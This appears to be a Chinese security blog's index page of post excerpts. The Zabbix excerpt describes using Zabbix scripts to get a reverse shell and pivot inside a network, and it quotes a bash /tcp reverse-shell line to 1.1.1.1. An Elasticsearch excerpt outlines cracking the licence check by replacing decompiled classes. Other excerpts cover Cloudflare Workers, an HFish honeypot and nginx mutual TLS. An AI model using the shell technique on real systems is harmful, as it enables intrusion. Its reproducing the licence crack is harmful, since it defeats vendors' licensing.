该操作便于拿到zabbix服务器或者zabbix proxy,然后深入渗透,这个操作只对于6以后版本的zabbix,6之前的版本,不用那么费事,直接写命令执行即可,6之后的版本做了部分特殊字符过滤,直接执行命令执行不了,尝试过 /bin/bash -i >&/tcp/ip/1.1.1.1/23333这类操作,通过编码绕过,都不能很好的拿到bash伪终端。经过慢慢的尝试,最终使用nc反弹,也是能执行命令了。 然后在监测->主机,点击选择要执行的脚本 基本进去权限比较小,自行打通道后,进一步进行渗透即可,基本遇到的情况都是在同一个内网。 不建议使用zabbix作为企业服务监控,整不好内网就成马场。 目前使用 prometheus + grafana。
企业/项目 安全建设
lnmp + nextcloud 快速部署云盘
Elasticsearch 7.15.1 破解,升级为白金版
6.x的时候还有免费版,7.x就没有免费版了,只有试用版,而且只是三十天。 主要流程: 复制出 x-pack-core-7.15.1.jar —->反编译这个jar包里的两个文件(LicenseVerifier.class,XPackBuild.class) —->使用es环境的java编译LicenseVerifier.class,XPackBuild.class—->替换原x-pack-core-7.15.1.jar里的两个class文件 —->重启elasticsearch—->申请试用版获取Lisence,修改License里的版本和使用结束日期—->导入Lisence—->Done 一、复制出x-pack-core-7.15.1.jar 这个文件centos环境的路径是:/usr/share/el […]
Kibana 7.15.1中使用watcher添加钉钉通知
Cloudflare Worker基于路由规则拦截url中参数
今天工作遇到这样一个场景: 由于某种原因,某些接口不想做更改,又想弃用某些参数,让这些参数不再入库查询,直接返回指定响应,通过Cloudflare的 Worker可实现。例如对业务域名的type参数做拦截,如果 type参数等于unicon_sass,就返回403状态码,并返回json字符串。如下: 之后配置好url的路由规则进入这里做逻辑处理就好。 OK_DONE 如果只是想拦截某个接口,并响应指定内容或者json数据,可以使用如下方法: 如果只是想拦截某个header 里的key,并判断value值,如下即可:
HFish2021版企业级蜜罐使用的说明
官方的使用说明有些地方不够详细,对于第一次接触Hfish蜜罐来说,使用者光看官方说明还是不能够快速上手实现想要的需求的(例如自定义的Web钓鱼页面),这里所谓的快速,按理来说,个把小时就搞定所有。 正常的使用说明请参考官方,安装,使用等等….直通车☞当前版本2.4.2 这里还是简单的说一下快速使用。 按照官方的做法,安装好之后,如果想部署蜜罐并启用起来,只需要如下三个步骤: 这三个功能顺序来就行,里面的白话文容易理解。 这里主要讲一些坑的地方以及nginx的配置文件 第一个坑:上传包的格式一定是service-xxxx.zip,压缩包的内容不能参考官方包的service-oa.tar.gz目录结构 默认的web钓鱼蜜罐支持oa和wordpress,直接下载官方对应的蜜罐服务就行,但是想要自定义上传一些登陆页面,就需要自己自定义化,例如自己公司的admin后台,oa系统等等页面& […]
nginx配置CF双向认证
把相关证书复制到服务器,然后把证书添加到受信任目录 删除证书 在nginx conf文件里面添加证书调用即可。 最终通过ip访问https://ip 结果显示如下,只能走域名访问,且即使知道目标源ip,绑定host文件也没用,新建slb只保留一个443端口,突然觉得有点无解了。